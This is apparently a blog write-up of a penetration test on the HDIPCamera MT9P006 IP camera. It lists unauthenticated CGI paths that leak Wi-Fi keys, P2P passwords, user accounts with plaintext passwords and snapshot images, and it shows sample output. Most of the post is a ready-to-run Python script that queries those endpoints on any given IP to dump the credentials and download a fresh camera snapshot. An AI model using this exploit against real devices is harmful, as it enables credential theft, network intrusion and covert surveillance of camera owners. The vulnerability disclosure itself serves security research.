Exploiting HDIPCamera MT9P006

I pentested a camera, finding numerous vulnerabilities.
Product info:
HDIPCamera MT9P006
Version 1.0.1.2 (Dec 4 2015)
1/2.5-Inch 5 Mp CMOS Digital Image Sensor
Boardtype: 5300
sensortype: mt9p006
found in applications like:
• Digital still cameras
• Digital video cameras
• PC cameras
• Converged DSCs/camcorders
• Cellular phones
• PDAs
Let’s have a look. 😉
by just examining the source I found a few unprotected cgi requests.
A few importants cgi request can be used without any authorisation.

First getting some basic info

var serialNum="VVVIPCxxxxxxxxxxxx-xxxxxxxxxxxxx";
var model="RT_IPC"; var hardVersion="5300-mt9p006";
var softVersion="V2.3.5.2505-S50-SMA-B20151204B";
var ipcname="IPCAM";
var startdate="2016-8-30 21:56:44";
var runtimes="0 day, 1:58";
var sdstatus="out";
var sdfreespace="0 ";
var sdtotalspace="0 ";
var builddate="Dec 4 2015 ";
var productmodel="null";
var vendor="RTJ";
var swver="";
var hwver="";
var mppver="mpp";

P2P info

var p2p_enable = "1";
var p2p_id = "PPIV-xxxxx-WZDZZ";
var p2p_pwd = "xxx";

Wifi info

var wifissid = "xxx";
var wifikeytype = "3";
var wifiwhichkey = "0";
var wifikey="xxxxxxxxxxxxxxxx";
var wifienable="0";
var wifimac="xx:xx:xx:xx:xx:xx";
var wifienable="0";
var linkstatus="0";
var linkssid="";
var wifimode="";

rtsp info

var rtsplisnport="554";
var onvif_http_port="1018";
var rtsp_user_verify="0";

User info (Including passwords)

var name0="admin";
var password0="admin";
var authLevel0="255";
var name1="guest";
var password1="guest";
var authLevel1="3";
var name2="xxx";
var password2="xxx";
var authLevel2="3";
var name3="xxx";
var password3="xxx";
var authLevel3="3";
var name4="";
var password4="";
var authLevel4="3";
var name5="";
var password5="";
var authLevel5="3";
var name6="";
var password6="";
var authLevel6="3";
var name7="";
var password7="";
var authLevel7="3";
var name8="";
var password8="";
var authLevel8="0";
var name9="";
var password9="";
var authLevel9="0";
It’s getting even better.
A world readable url with all the snapshots taken.
Ow wait.. let’s make some snapshots..
outputs:
var path=”/tmpfs/snap_tmpfs/20160831/IMG001/IMG_chn0_TIMER_MNG_20160831230808_001.jpg”
.. a freshly made snapshot.
I made a python script to make use of these cgi’s and outputs all the info.
And to make a snapshot and save it to local.
#!/bin/python

# Quick & Dirty tool
# Get all the info from the IPcam 5300 MT9P006
#
# Use commandline parameters to retrieve all kinds of info
#
# usage for all the info
# python IPcam_5300-mt9p006.py --ip <ip> --snapshot --getp2p --getwifi --getrtsp --getusers

import urllib
import urllib2
import re
import argparse

p2p="/cgi-bin/p2p.cgi?cmd=p2p.cgi&-action=get"
wifi="/cgi-bin/getwifiattr.cgi"
rtsp="/cgi-bin/hi3510/getrtsplisnport.cgi"
snap="/web/cgi-bin/hi3510/param.cgi?cmd=snap"
snap_dir="/tmpfs/snap_tmpfs/"
users="/web/cgi-bin/hi3510/param.cgi?cmd=getuser"

def get_param():
    print "./IPcam_5300-mt9p600.py -h for cmd options"
    try:
        parser = argparse.ArgumentParser()
        parser.add_argument("--ip", dest="ip", default="", help="ip adres", required=True)
        parser.add_argument("--snapshot", dest="snapshot", action="store_true", help="make and download snapshot")
        parser.add_argument("--getp2p", dest="getp2p", action="store_true", help="get p2p info (incl. password)")
        parser.add_argument("--getwifi", dest="getwifi", action="store_true", help="get wifi info (incl. password)")
        parser.add_argument("--getrtsp", dest="getrtsp", action="store_true", help="get rtsp info")
        parser.add_argument("--getusers", dest="getusers", action="store_true", help="get user info (incl. passwords)")
        args = parser.parse_args()
        return args
    except IOError, msg:
        parser.error(str(msg))

def main():
    params = get_param()
    if params.snapshot:
        # call cgi to make snapshot and save to local drive
        print "make and download snapshot\n"
        req = urllib2.Request("http://"+params.ip+snap)
        url_data = urllib2.urlopen(req).read()
        match = re.search(r"/(.*)", url_data)
        snapfile_path = match.group(0)
        # remove last 2 char " and \n
        snapfile_path = snapfile_path[:-2]
        match = re.search(r"IMG_(.*).jpg", snapfile_path)
        snap_filename = match.group(0)
        print "Snap file url: %s" % snapfile_path
        print "Save output to: %s " % snap_filename
        cmd="http://" + params.ip + snapfile_path
        req1 = urllib2.Request(cmd)
        f = open(snap_filename, "wb")
        f.write(urllib2.urlopen(req1).read())
        f.close()

    if params.getp2p:
        print "Get p2p info"
        req = urllib2.Request("http://" + params.ip + p2p)
        url_data = urllib2.urlopen(req).read()
        print url_data
    if params.getwifi:
        print "Get wifi info"
        req = urllib2.Request("http://" + params.ip + wifi)
        url_data = urllib2.urlopen(req).read()
        print url_data
    if params.getrtsp:
        print "Get rtsp info"
        req = urllib2.Request("http://" + params.ip + rtsp)
        url_data = urllib2.urlopen(req).read()
        print url_data
    if params.getusers:
        print "Get users info"
        req = urllib2.Request("http://" + params.ip + users)
        url_data = urllib2.urlopen(req).read()
        print url_data

if __name__ == "__main__":
  main()